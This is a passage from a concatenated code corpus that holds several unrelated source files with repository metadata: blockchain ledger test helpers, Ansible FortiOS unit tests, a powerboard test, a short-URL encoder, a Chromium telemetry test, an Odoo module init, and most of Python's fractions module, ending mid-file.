assert multi_sig_value[MULTI_SIGNATURE_VALUE_TXN_ROOT]
assert MULTI_SIGNATURE_VALUE_POOL_STATE_ROOT in multi_sig_value
assert multi_sig_value[MULTI_SIGNATURE_VALUE_POOL_STATE_ROOT]
assert MULTI_SIGNATURE_VALUE_TIMESTAMP in multi_sig_value
assert multi_sig_value[MULTI_SIGNATURE_VALUE_TIMESTAMP]
if expected_key is not None:
proof_nodes = base64.b64decode(state_proof[PROOF_NODES])
root_hash = base58.b58decode(state_proof[ROOT_HASH])
assert PruningState.verify_state_proof(root_hash,
expected_key,
expected_value,
proof_nodes, serialized=True)
# TODO: Validate signatures as well?
def expected_state_data(data: TaaData) -> Dict:
return {
'lsn': data.seq_no,
'lut': data.txn_time,
'val': {
TXN_AUTHOR_AGREEMENT_TEXT: data.text,
TXN_AUTHOR_AGREEMENT_VERSION: data.version,
TXN_AUTHOR_AGREEMENT_DIGEST: StaticTAAHelper.taa_digest(data.text, data.version),
TXN_AUTHOR_AGREEMENT_RATIFICATION_TS: data.txn_time
}
}
def expected_data(data: TaaData):
return {
TXN_AUTHOR_AGREEMENT_TEXT: data.text,
TXN_AUTHOR_AGREEMENT_VERSION: data.version,
TXN_AUTHOR_AGREEMENT_DIGEST: StaticTAAHelper.taa_digest(data.text, data.version),
TXN_AUTHOR_AGREEMENT_RATIFICATION_TS: data.txn_time
}, data.seq_no, data.txn_time
def expected_aml_data(data: TaaAmlData):
return {
AML_VERSION: data.version,
AML: data.aml,
AML_CONTEXT: data.amlContext
}, data.seq_no, data.txn_time
def gen_random_txn_author_agreement(text_size=1024, version_size=16):
return randomString(text_size), randomString(version_size)
# TODO might make sense to use sdk's api
def calc_taa_digest(text, version):
return WriteRequestManager._taa_digest(text, version)
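# --- Illustrative sketch (not part of the original helper): the digest used
# throughout these helpers is just sha256(version + text), so the local
# taa_digest() above and an inline hash of the concatenation should agree.
def _taa_digest_example():
    text, version = gen_random_txn_author_agreement()
    assert taa_digest(text, version) == sha256((version + text).encode()).hexdigest()
    return taa_digest(text, version)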
| apache-2.0 |
broferek/ansible | test/units/modules/network/fortios/test_fortios_user_domain_controller.py | 21 | 8877 |
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <https://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
from mock import ANY
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
try:
from ansible.modules.network.fortios import fortios_user_domain_controller
except ImportError:
pytest.skip("Could not load required modules for testing", allow_module_level=True)
@pytest.fixture(autouse=True)
def connection_mock(mocker):
connection_class_mock = mocker.patch('ansible.modules.network.fortios.fortios_user_domain_controller.Connection')
return connection_class_mock
fos_instance = FortiOSHandler(connection_mock)
def test_user_domain_controller_creation(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'user_domain_controller': {
'domain_name': 'test_value_3',
'ip_address': 'test_value_4',
'ldap_server': 'test_value_5',
'name': 'default_name_6',
'port': '7'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_domain_controller.fortios_user(input_data, fos_instance)
expected_data = {
'domain-name': 'test_value_3',
'ip-address': 'test_value_4',
'ldap-server': 'test_value_5',
'name': 'default_name_6',
'port': '7'
}
set_method_mock.assert_called_with('user', 'domain-controller', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_user_domain_controller_creation_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'user_domain_controller': {
'domain_name': 'test_value_3',
'ip_address': 'test_value_4',
'ldap_server': 'test_value_5',
'name': 'default_name_6',
'port': '7'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_domain_controller.fortios_user(input_data, fos_instance)
expected_data = {
'domain-name': 'test_value_3',
'ip-address': 'test_value_4',
'ldap-server': 'test_value_5',
'name': 'default_name_6',
'port': '7'
}
set_method_mock.assert_called_with('user', 'domain-controller', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_user_domain_controller_removal(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
delete_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
delete_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.delete', return_value=delete_method_result)
input_data = {
'username': 'admin',
'state': 'absent',
'user_domain_controller': {
'domain_name': 'test_value_3',
'ip_address': 'test_value_4',
'ldap_server': 'test_value_5',
'name': 'default_name_6',
'port': '7'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_domain_controller.fortios_user(input_data, fos_instance)
delete_method_mock.assert_called_with('user', 'domain-controller', mkey=ANY, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_user_domain_controller_deletion_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
delete_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
delete_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.delete', return_value=delete_method_result)
input_data = {
'username': 'admin',
'state': 'absent',
'user_domain_controller': {
'domain_name': 'test_value_3',
'ip_address': 'test_value_4',
'ldap_server': 'test_value_5',
'name': 'default_name_6',
'port': '7'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_domain_controller.fortios_user(input_data, fos_instance)
delete_method_mock.assert_called_with('user', 'domain-controller', mkey=ANY, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_user_domain_controller_idempotent(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'DELETE', 'http_status': 404}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'user_domain_controller': {
'domain_name': 'test_value_3',
'ip_address': 'test_value_4',
'ldap_server': 'test_value_5',
'name': 'default_name_6',
'port': '7'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_domain_controller.fortios_user(input_data, fos_instance)
expected_data = {
'domain-name': 'test_value_3',
'ip-address': 'test_value_4',
'ldap-server': 'test_value_5',
'name': 'default_name_6',
'port': '7'
}
set_method_mock.assert_called_with('user', 'domain-controller', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 404
def test_user_domain_controller_filter_foreign_attributes(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'user_domain_controller': {
'random_attribute_not_valid': 'tag',
'domain_name': 'test_value_3',
'ip_address': 'test_value_4',
'ldap_server': 'test_value_5',
'name': 'default_name_6',
'port': '7'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_domain_controller.fortios_user(input_data, fos_instance)
expected_data = {
'domain-name': 'test_value_3',
'ip-address': 'test_value_4',
'ldap-server': 'test_value_5',
'name': 'default_name_6',
'port': '7'
}
set_method_mock.assert_called_with('user', 'domain-controller', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
| gpl-3.0 |
orestkreminskyi/taf | unittests/test_pwsw.py | 2 | 1228 |
# Copyright (c) 2011 - 2017, Intel Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""``test_pwsw.py``
`Unit tests for powerboard functions`
"""
import pytest
from testlib import powerboard
host = '127.0.0.1'
port = '12'
rw_community_string = 'private'
@pytest.mark.skipif("True", reason="Test case skipped by 'skiptest' marker")
def test_pwsw1():
status = powerboard.get_status(host, port, rw_community_string)
if status == "On":
powerboard.do_action(host, port, rw_community_string, powerboard.commands["Reset"])
elif status == "Off":
powerboard.do_action(host, port, rw_community_string, powerboard.commands["On"])
else:
raise Exception("Cannot determine device status.")
| apache-2.0 |
mouradmourafiq/django-short-urls | short_urls/url_generator.py | 1 | 1921 |
# -*- coding: utf-8 -*-
DEFAULT_ALPHABET = 'az7er5tyu1io0pq4sd9fg6hjk8lmw3xcv2bn'
LENGTH_GENERATION = 32
MIN_LENGTH = 6
class URLEncoder(object):
"""
It generates 36**6 = 2176782336 values (6 lowercase letters) which falls between 2**31 = 2147483648 and 2**32 = 4294967296.
It pads the codes that are shorter than 6 characters with leading 'a' characters.
"""
def __init__(self, alphabet=DEFAULT_ALPHABET, length_generation=LENGTH_GENERATION):
self.alphabet = alphabet
self.length_generation = length_generation
self.mask = (1 << length_generation) - 1
self.mapping = range(length_generation)
self.mapping.reverse()
def encode_url(self, n, min_length=MIN_LENGTH):
return self.__enbase(self.__encode(n), min_length)
def decode_url(self, n):
return self.__decode(self.__debase(n))
def __encode(self, n):
result = 0
for i, b in enumerate(self.mapping):
if (n & self.mask) & (1 << i):
result |= (1 << b)
return (n & ~self.mask) | result
def __decode(self, n):
result = 0
for i, b in enumerate(self.mapping):
if (n & self.mask) & (1 << b):
result |= (1 << i)
return (n & ~self.mask) | result
def __enbase(self, x, min_length=MIN_LENGTH):
result = self.__enbase_iter(x)
padding = self.alphabet[0] * (min_length - len(result))
return '%s%s' % (padding, result)
def __enbase_iter(self, x):
n = len(self.alphabet)
if x < n:
return self.alphabet[x]
return self.__enbase_iter(x / n) + self.alphabet[x % n]
def __debase(self, x):
n = len(self.alphabet)
result = 0
for i, c in enumerate(reversed(x)):
result += self.alphabet.index(c) * (n ** i)
return result
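# --- Illustrative round trip (not part of the original module; Python 2 only,
# since the encoder relies on a list-returning range() and integer division).
def _example_roundtrip():
    encoder = URLEncoder()
    short = encoder.encode_url(12345)          # short slug, padded to MIN_LENGTH chars
    assert encoder.decode_url(short) == 12345  # decoding restores the integer
    return short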
| bsd-2-clause |
hujiajie/chromium-crosswalk | tools/perf/measurements/rasterize_and_record_micro_unittest.py | 26 | 4474 |
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
from telemetry import decorators
from telemetry.page import page_test
from telemetry.testing import options_for_unittests
from telemetry.testing import page_test_test_case
from telemetry.util import wpr_modes
from measurements import rasterize_and_record_micro
class RasterizeAndRecordMicroUnitTest(page_test_test_case.PageTestTestCase):
"""Smoke test for rasterize_and_record_micro measurement
Runs rasterize_and_record_micro measurement on a simple page and verifies
that all metrics were added to the results. The test is purely functional,
i.e. it only checks if the metrics are present and non-zero.
"""
def setUp(self):
self._options = options_for_unittests.GetCopy()
self._options.browser_options.wpr_mode = wpr_modes.WPR_OFF
@decorators.Disabled('win', 'chromeos')
def testRasterizeAndRecordMicro(self):
ps = self.CreateStorySetFromFileInUnittestDataDir('blank.html')
measurement = rasterize_and_record_micro.RasterizeAndRecordMicro(
rasterize_repeat=1, record_repeat=1, start_wait_time=0.0,
report_detailed_results=True)
try:
results = self.RunMeasurement(measurement, ps, options=self._options)
except page_test.TestNotSupportedOnPlatformError as failure:
logging.warning(str(failure))
return
self.assertEquals(0, len(results.failures))
rasterize_time = results.FindAllPageSpecificValuesNamed('rasterize_time')
self.assertEquals(len(rasterize_time), 1)
self.assertGreater(rasterize_time[0].GetRepresentativeNumber(), 0)
record_time = results.FindAllPageSpecificValuesNamed('record_time')
self.assertEquals(len(record_time), 1)
self.assertGreater(record_time[0].GetRepresentativeNumber(), 0)
rasterized_pixels = results.FindAllPageSpecificValuesNamed(
'pixels_rasterized')
self.assertEquals(len(rasterized_pixels), 1)
self.assertGreater(rasterized_pixels[0].GetRepresentativeNumber(), 0)
recorded_pixels = results.FindAllPageSpecificValuesNamed('pixels_recorded')
self.assertEquals(len(recorded_pixels), 1)
self.assertGreater(recorded_pixels[0].GetRepresentativeNumber(), 0)
pixels_rasterized_with_non_solid_color = \
results.FindAllPageSpecificValuesNamed(
'pixels_rasterized_with_non_solid_color')
self.assertEquals(len(pixels_rasterized_with_non_solid_color), 1)
self.assertGreater(
pixels_rasterized_with_non_solid_color[0].GetRepresentativeNumber(), 0)
pixels_rasterized_as_opaque = \
results.FindAllPageSpecificValuesNamed('pixels_rasterized_as_opaque')
self.assertEquals(len(pixels_rasterized_as_opaque), 1)
self.assertGreater(
pixels_rasterized_as_opaque[0].GetRepresentativeNumber(), 0)
total_layers = results.FindAllPageSpecificValuesNamed('total_layers')
self.assertEquals(len(total_layers), 1)
self.assertGreater(total_layers[0].GetRepresentativeNumber(), 0)
total_picture_layers = \
results.FindAllPageSpecificValuesNamed('total_picture_layers')
self.assertEquals(len(total_picture_layers), 1)
self.assertGreater(total_picture_layers[0].GetRepresentativeNumber(), 0)
total_picture_layers_with_no_content = \
results.FindAllPageSpecificValuesNamed(
'total_picture_layers_with_no_content')
self.assertEquals(len(total_picture_layers_with_no_content), 1)
self.assertGreater(
total_picture_layers_with_no_content[0].GetRepresentativeNumber(), 0)
total_picture_layers_off_screen = \
results.FindAllPageSpecificValuesNamed(
'total_picture_layers_off_screen')
self.assertEquals(len(total_picture_layers_off_screen), 1)
self.assertEqual(
total_picture_layers_off_screen[0].GetRepresentativeNumber(), 0)
viewport_picture_size = \
results.FindAllPageSpecificValuesNamed('viewport_picture_size')
self.assertEquals(len(viewport_picture_size), 1)
self.assertGreater(
viewport_picture_size[0].GetRepresentativeNumber(), 0)
total_size_of_pictures_in_piles = \
results.FindAllPageSpecificValuesNamed(
'total_size_of_pictures_in_piles')
self.assertEquals(len(total_size_of_pictures_in_piles), 1)
self.assertGreater(
total_size_of_pictures_in_piles[0].GetRepresentativeNumber(), 0)
| bsd-3-clause |
jaxkodex/odoo | addons/l10n_fr/report/__init__.py | 424 | 1475 |
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (c) 2008 JAILLET Simon - CrysaLEAD - www.crysalead.fr
#
# WARNING: This program as such is intended to be used by professional
# programmers who take the whole responsability of assessing all potential
# consequences resulting from its eventual inadequacies and bugs
# End users who are looking for a ready-to-use solution with commercial
# garantees and support are strongly adviced to contract a Free Software
# Service Company
#
# This program is Free Software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
##############################################################################
import base_report
import bilan_report
import compute_resultant_report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
Voluntarynet/BitmessageKit | BitmessageKit/Vendor/static-python/Lib/fractions.py | 252 | 22390 |
# Originally contributed by Sjoerd Mullender.
# Significantly modified by Jeffrey Yasskin <jyasskin at gmail.com>.
"""Rational, infinite-precision, real numbers."""
from __future__ import division
from decimal import Decimal
import math
import numbers
import operator
import re
__all__ = ['Fraction', 'gcd']
Rational = numbers.Rational
def gcd(a, b):
"""Calculate the Greatest Common Divisor of a and b.
Unless b==0, the result will have the same sign as b (so that when
b is divided by it, the result comes out positive).
"""
while b:
a, b = b, a%b
return a
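# For example (illustrative note, not in the original source): gcd(4, -6) == -2
# and gcd(-4, 6) == 2, matching the sign rule described in the docstring above.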
_RATIONAL_FORMAT = re.compile(r"""
\A\s* # optional whitespace at the start, then
(?P<sign>[-+]?) # an optional sign, then
(?=\d|\.\d) # lookahead for digit or .digit
(?P<num>\d*) # numerator (possibly empty)
(?: # followed by
(?:/(?P<denom>\d+))? # an optional denominator
| # or
(?:\.(?P<decimal>\d*))? # an optional fractional part
(?:E(?P<exp>[-+]?\d+))? # and optional exponent
)
\s*\Z # and optional whitespace to finish
""", re.VERBOSE | re.IGNORECASE)
class Fraction(Rational):
"""This class implements rational numbers.
In the two-argument form of the constructor, Fraction(8, 6) will
produce a rational number equivalent to 4/3. Both arguments must
be Rational. The numerator defaults to 0 and the denominator
defaults to 1 so that Fraction(3) == 3 and Fraction() == 0.
Fractions can also be constructed from:
- numeric strings similar to those accepted by the
float constructor (for example, '-2.3' or '1e10')
- strings of the form '123/456'
- float and Decimal instances
- other Rational instances (including integers)
"""
__slots__ = ('_numerator', '_denominator')
# We're immutable, so use __new__ not __init__
def __new__(cls, numerator=0, denominator=None):
"""Constructs a Fraction.
Takes a string like '3/2' or '1.5', another Rational instance, a
numerator/denominator pair, or a float.
Examples
--------
>>> Fraction(10, -8)
Fraction(-5, 4)
>>> Fraction(Fraction(1, 7), 5)
Fraction(1, 35)
>>> Fraction(Fraction(1, 7), Fraction(2, 3))
Fraction(3, 14)
>>> Fraction('314')
Fraction(314, 1)
>>> Fraction('-35/4')
Fraction(-35, 4)
>>> Fraction('3.1415') # conversion from numeric string
Fraction(6283, 2000)
>>> Fraction('-47e-2') # string may include a decimal exponent
Fraction(-47, 100)
>>> Fraction(1.47) # direct construction from float (exact conversion)
Fraction(6620291452234629, 4503599627370496)
>>> Fraction(2.25)
Fraction(9, 4)
>>> Fraction(Decimal('1.47'))
Fraction(147, 100)
"""
self = super(Fraction, cls).__new__(cls)
if denominator is None:
if isinstance(numerator, Rational):
self._numerator = numerator.numerator
self._denominator = numerator.denominator
return self
elif isinstance(numerator, float):
# Exact conversion from float
value = Fraction.from_float(numerator)
self._numerator = value._numerator
self._denominator = value._denominator
return self
elif isinstance(numerator, Decimal):
value = Fraction.from_decimal(numerator)
self._numerator = value._numerator
self._denominator = value._denominator
return self
elif isinstance(numerator, basestring):
# Handle construction from strings.
m = _RATIONAL_FORMAT.match(numerator)
if m is None:
raise ValueError('Invalid literal for Fraction: %r' %
numerator)
numerator = int(m.group('num') or '0')
denom = m.group('denom')
if denom:
denominator = int(denom)
else:
denominator = 1
decimal = m.group('decimal')
if decimal:
scale = 10**len(decimal)
numerator = numerator * scale + int(decimal)
denominator *= scale
exp = m.group('exp')
if exp:
exp = int(exp)
if exp >= 0:
numerator *= 10**exp
else:
denominator *= 10**-exp
if m.group('sign') == '-':
numerator = -numerator
else:
raise TypeError("argument should be a string "
"or a Rational instance")
elif (isinstance(numerator, Rational) and
isinstance(denominator, Rational)):
numerator, denominator = (
numerator.numerator * denominator.denominator,
denominator.numerator * numerator.denominator
)
else:
raise TypeError("both arguments should be "
"Rational instances")
if denominator == 0:
raise ZeroDivisionError('Fraction(%s, 0)' % numerator)
g = gcd(numerator, denominator)
self._numerator = numerator // g
self._denominator = denominator // g
return self
@classmethod
def from_float(cls, f):
"""Converts a finite float to a rational number, exactly.
Beware that Fraction.from_float(0.3) != Fraction(3, 10).
"""
if isinstance(f, numbers.Integral):
return cls(f)
elif not isinstance(f, float):
raise TypeError("%s.from_float() only takes floats, not %r (%s)" %
(cls.__name__, f, type(f).__name__))
if math.isnan(f) or math.isinf(f):
raise TypeError("Cannot convert %r to %s." % (f, cls.__name__))
return cls(*f.as_integer_ratio())
@classmethod
def from_decimal(cls, dec):
"""Converts a finite Decimal instance to a rational number, exactly."""
from decimal import Decimal
if isinstance(dec, numbers.Integral):
dec = Decimal(int(dec))
elif not isinstance(dec, Decimal):
raise TypeError(
"%s.from_decimal() only takes Decimals, not %r (%s)" %
(cls.__name__, dec, type(dec).__name__))
if not dec.is_finite():
# Catches infinities and nans.
raise TypeError("Cannot convert %s to %s." % (dec, cls.__name__))
sign, digits, exp = dec.as_tuple()
digits = int(''.join(map(str, digits)))
if sign:
digits = -digits
if exp >= 0:
return cls(digits * 10 ** exp)
else:
return cls(digits, 10 ** -exp)
def limit_denominator(self, max_denominator=1000000):
"""Closest Fraction to self with denominator at most max_denominator.
>>> Fraction('3.141592653589793').limit_denominator(10)
Fraction(22, 7)
>>> Fraction('3.141592653589793').limit_denominator(100)
Fraction(311, 99)
>>> Fraction(4321, 8765).limit_denominator(10000)
Fraction(4321, 8765)
"""
# Algorithm notes: For any real number x, define a *best upper
# approximation* to x to be a rational number p/q such that:
#
# (1) p/q >= x, and
# (2) if p/q > r/s >= x then s > q, for any rational r/s.
#
# Define *best lower approximation* similarly. Then it can be
# proved that a rational number is a best upper or lower
# approximation to x if, and only if, it is a convergent or
# semiconvergent of the (unique shortest) continued fraction
# associated to x.
#
# To find a best rational approximation with denominator <= M,
# we find the best upper and lower approximations with
# denominator <= M and take whichever of these is closer to x.
# In the event of a tie, the bound with smaller denominator is
# chosen. If both denominators are equal (which can happen
# only when max_denominator == 1 and self is midway between
# two integers) the lower bound---i.e., the floor of self, is
# taken.
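        # Worked example (added for illustration, not in the original source):
        # for self = Fraction(355, 113) and max_denominator = 100 the loop
        # below yields the convergent 22/7 (bound2) and the semiconvergent
        # 311/99 (bound1); 311/99 is the closer of the two, so it is returned.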
if max_denominator < 1:
raise ValueError("max_denominator should be at least 1")
if self._denominator <= max_denominator:
return Fraction(self)
p0, q0, p1, q1 = 0, 1, 1, 0
n, d = self._numerator, self._denominator
while True:
a = n//d
q2 = q0+a*q1
if q2 > max_denominator:
break
p0, q0, p1, q1 = p1, q1, p0+a*p1, q2
n, d = d, n-a*d
k = (max_denominator-q0)//q1
bound1 = Fraction(p0+k*p1, q0+k*q1)
bound2 = Fraction(p1, q1)
if abs(bound2 - self) <= abs(bound1-self):
return bound2
else:
return bound1
@property
def numerator(a):
return a._numerator
@property
def denominator(a):
return a._denominator
def __repr__(self):
"""repr(self)"""
return ('Fraction(%s, %s)' % (self._numerator, self._denominator))
def __str__(self):
"""str(self)"""
if self._denominator == 1:
return str(self._numerator)
else:
return '%s/%s' % (self._numerator, self._denominator)
def _operator_fallbacks(monomorphic_operator, fallback_operator):
"""Generates forward and reverse operators given a purely-rational
operator and a function from the operator module.
Use this like:
__op__, __rop__ = _operator_fallbacks(just_rational_op, operator.op)
In general, we want to implement the arithmetic operations so
that mixed-mode operations either call an implementation whose
author knew about the types of both arguments, or convert both
to the nearest built in type and do the operation there. In
Fraction, that means that we define __add__ and __radd__ as:
def __add__(self, other):
# Both types have numerators/denominator attributes,
# so do the operation directly
if isinstance(other, (int, long, Fraction)):
return Fraction(self.numerator * other.denominator +
other.numerator * self.denominator,
self.denominator * other.denominator)
# float and complex don't have those operations, but we
# know about those types, so special case them.
elif isinstance(other, float):
return float(self) + other
elif isinstance(other, complex):
return complex(self) + other
# Let the other type take over.
return NotImplemented
def __radd__(self, other):
# radd handles more types than add because there's
# nothing left to fall back to.
if isinstance(other, Rational):
return Fraction(self.numerator * other.denominator +
other.numerator * self.denominator,
self.denominator * other.denominator)
elif isinstance(other, Real):
return float(other) + float(self)
elif isinstance(other, Complex):
return complex(other) + complex(self)
return NotImplemented
There are 5 different cases for a mixed-type addition on
Fraction. I'll refer to all of the above code that doesn't
refer to Fraction, float, or complex as "boilerplate". 'r'
will be an instance of Fraction, which is a subtype of
Rational (r : Fraction <: Rational), and b : B <:
Complex. The first three involve 'r + b':
1. If B <: Fraction, int, float, or complex, we handle
that specially, and all is well.
2. If Fraction falls back to the boilerplate code, and it
were to return a value from __add__, we'd miss the
possibility that B defines a more intelligent __radd__,
so the boilerplate should return NotImplemented from
__add__. In particular, we don't handle Rational
here, even though we could get an exact answer, in case
the other type wants to do something special.
3. If B <: Fraction, Python tries B.__radd__ before
Fraction.__add__. This is ok, because it was
implemented with knowledge of Fraction, so it can
handle those instances before delegating to Real or
Complex.
The next two situations describe 'b + r'. We assume that b
didn't know about Fraction in its implementation, and that it
uses similar boilerplate code:
        4. If B <: Rational, then __radd__ converts both to the
builtin rational type (hey look, that's us) and
proceeds.
5. Otherwise, __radd__ tries to find the nearest common
base ABC, and fall back to its builtin type. Since this
class doesn't subclass a concrete type, there's no
implementation to fall back to, so we need to try as
hard as possible to return an actual value, or the user
will get a TypeError.
"""
def forward(a, b):
if isinstance(b, (int, long, Fraction)):
return monomorphic_operator(a, b)
elif isinstance(b, float):
return fallback_operator(float(a), b)
elif isinstance(b, complex):
return fallback_operator(complex(a), b)
else:
return NotImplemented
forward.__name__ = '__' + fallback_operator.__name__ + '__'
forward.__doc__ = monomorphic_operator.__doc__
def reverse(b, a):
if isinstance(a, Rational):
# Includes ints.
return monomorphic_operator(a, b)
elif isinstance(a, numbers.Real):
return fallback_operator(float(a), float(b))
elif isinstance(a, numbers.Complex):
return fallback_operator(complex(a), complex(b))
else:
return NotImplemented
reverse.__name__ = '__r' + fallback_operator.__name__ + '__'
reverse.__doc__ = monomorphic_operator.__doc__
return forward, reverse
def _add(a, b):
"""a + b"""
return Fraction(a.numerator * b.denominator +
b.numerator * a.denominator,
a.denominator * b.denominator)
__add__, __radd__ = _operator_fallbacks(_add, operator.add)
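    # Illustrative behaviour of the generated pair (added comment):
    # Fraction(1, 2) + Fraction(1, 3) stays exact and gives Fraction(5, 6),
    # while Fraction(1, 2) + 0.5 falls back to float arithmetic and gives 1.0.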
def _sub(a, b):
"""a - b"""
return Fraction(a.numerator * b.denominator -
b.numerator * a.denominator,
a.denominator * b.denominator)
__sub__, __rsub__ = _operator_fallbacks(_sub, operator.sub)
def _mul(a, b):
"""a * b"""
return Fraction(a.numerator * b.numerator, a.denominator * b.denominator)
__mul__, __rmul__ = _operator_fallbacks(_mul, operator.mul)
def _div(a, b):
"""a / b"""
return Fraction(a.numerator * b.denominator,
a.denominator * b.numerator)
__truediv__, __rtruediv__ = _operator_fallbacks(_div, operator.truediv)
__div__, __rdiv__ = _operator_fallbacks(_div, operator.div)
def __floordiv__(a, b):
"""a // b"""
# Will be math.floor(a / b) in 3.0.
div = a / b
if isinstance(div, Rational):
# trunc(math.floor(div)) doesn't work if the rational is
# more precise than a float because the intermediate
# rounding may cross an integer boundary.
return div.numerator // div.denominator
else:
return math.floor(div)
def __rfloordiv__(b, a):
"""a // b"""
# Will be math.floor(a / b) in 3.0.
div = a / b
if isinstance(div, Rational):
# trunc(math.floor(div)) doesn't work if the rational is
# more precise than a float because the intermediate
# rounding may cross an integer boundary.
return div.numerator // div.denominator
else:
return math.floor(div)
def __mod__(a, b):
"""a % b"""
div = a // b
return a - b * div
def __rmod__(b, a):
"""a % b"""
div = a // b
return a - b * div
def __pow__(a, b):
"""a ** b
If b is not an integer, the result will be a float or complex
since roots are generally irrational. If b is an integer, the
result will be rational.
"""
if isinstance(b, Rational):
if b.denominator == 1:
power = b.numerator
if power >= 0:
return Fraction(a._numerator ** power,
a._denominator ** power)
else:
return Fraction(a._denominator ** -power,
a._numerator ** -power)
else:
# A fractional power will generally produce an
# irrational number.
return float(a) ** float(b)
else:
return float(a) ** b
def __rpow__(b, a):
"""a ** b"""
if b._denominator == 1 and b._numerator >= 0:
# If a is an int, keep it that way if possible.
return a ** b._numerator
if isinstance(a, Rational):
return Fraction(a.numerator, a.denominator) ** b
if b._denominator == 1:
return a ** b._numerator
return a ** float(b)
def __pos__(a):
"""+a: Coerces a subclass instance to Fraction"""
return Fraction(a._numerator, a._denominator)
def __neg__(a):
"""-a"""
return Fraction(-a._numerator, a._denominator)
def __abs__(a):
"""abs(a)"""
return Fraction(abs(a._numerator), a._denominator)
def __trunc__(a):
"""trunc(a)"""
if a._numerator < 0:
return -(-a._numerator // a._denominator)
else:
return a._numerator // a._denominator
def __hash__(self):
"""hash(self)
Tricky because values that are exactly representable as a
float must have the same hash as that float.
"""
# XXX since this method is expensive, consider caching the result
if self._denominator == 1:
# Get integers right.
return hash(self._numerator)
# Expensive check, but definitely correct.
if self == float(self):
return hash(float(self))
else:
# Use tuple's hash to avoid a high collision rate on
# simple fractions.
return hash((self._numerator, self._denominator))
def __eq__(a, b):
"""a == b"""
if isinstance(b, Rational):
return (a._numerator == b.numerator and
a._denominator == b.denominator)
if isinstance(b, numbers.Complex) and b.imag == 0:
b = b.real
if isinstance(b, float):
if math.isnan(b) or math.isinf(b):
# comparisons with an infinity or nan should behave in
# the same way for any finite a, so treat a as zero.
return 0.0 == b
else:
return a == a.from_float(b)
else:
# Since a doesn't know how to compare with b, let's give b
# a chance to compare itself with a.
return NotImplemented
def _richcmp(self, other, op):
"""Helper for comparison operators, for internal use only.
Implement comparison between a Rational instance `self`, and
